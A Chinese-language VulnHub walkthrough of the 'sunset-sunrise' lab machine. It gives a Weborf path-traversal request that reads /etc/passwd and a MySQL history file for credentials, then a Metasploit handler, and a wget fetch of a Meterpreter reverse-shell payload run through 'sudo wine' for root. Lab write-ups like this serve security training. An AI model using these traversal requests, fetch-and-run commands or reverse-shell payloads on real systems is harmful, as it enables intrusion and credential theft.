靶机链接:

https://www.vulnhub.com/entry/sunset-sunrise,406/

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

主机扫描:

Sunset-Sunrise: Vulnhub Walkthrough Safe 第1张

 

端口扫描:

Sunset-Sunrise: Vulnhub Walkthrough Safe 第2张

 

HTTP 80 目录枚举未果

HTTP 8080

Sunset-Sunrise: Vulnhub Walkthrough Safe 第3张

 

Google search :Weborf/0.12.2 exploit

https://www.exploit-db.com/exploits/14925

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Sunset-Sunrise: Vulnhub Walkthrough Safe 第4张

 

成功读取文件,然后我们尝试读取一些敏感的目录和文件,最后读取MySQL的密码:

http://10.10.203.22:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history

Sunset-Sunrise: Vulnhub Walkthrough Safe 第5张

 

尝试使用账户登录系统

Sunset-Sunrise: Vulnhub Walkthrough Safe 第6张

如何获取用户sunsire的权限,最后通过MySQL的用户信息获取到了密码

Sunset-Sunrise: Vulnhub Walkthrough Safe 第7张

 

接下来进行提权操作

这里使用wine命令

控制端生成payload

msfpc windows 10.10.203.14

Sunset-Sunrise: Vulnhub Walkthrough Safe 第8张

 

python -m SimpleHTTPServer 8888

Sunset-Sunrise: Vulnhub Walkthrough Safe 第9张

 

use exploit/multi/handler

set encoder x86/shikata_ga_nai

set lhost 10.10.203.14

set lport 443

exploit -j

 

靶机上执行:

wget http://10.10.203.14:8888/windows-meterpreter-staged-reverse-tcp-443.exe

sudo wine windows-meterpreter-staged-reverse-tcp-443.exe 

然后控制端就shell上线了

 

Sunset-Sunrise: Vulnhub Walkthrough Safe 第10张

 

Sunset-Sunrise: Vulnhub Walkthrough Safe 第11张

 

OVER!!! 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄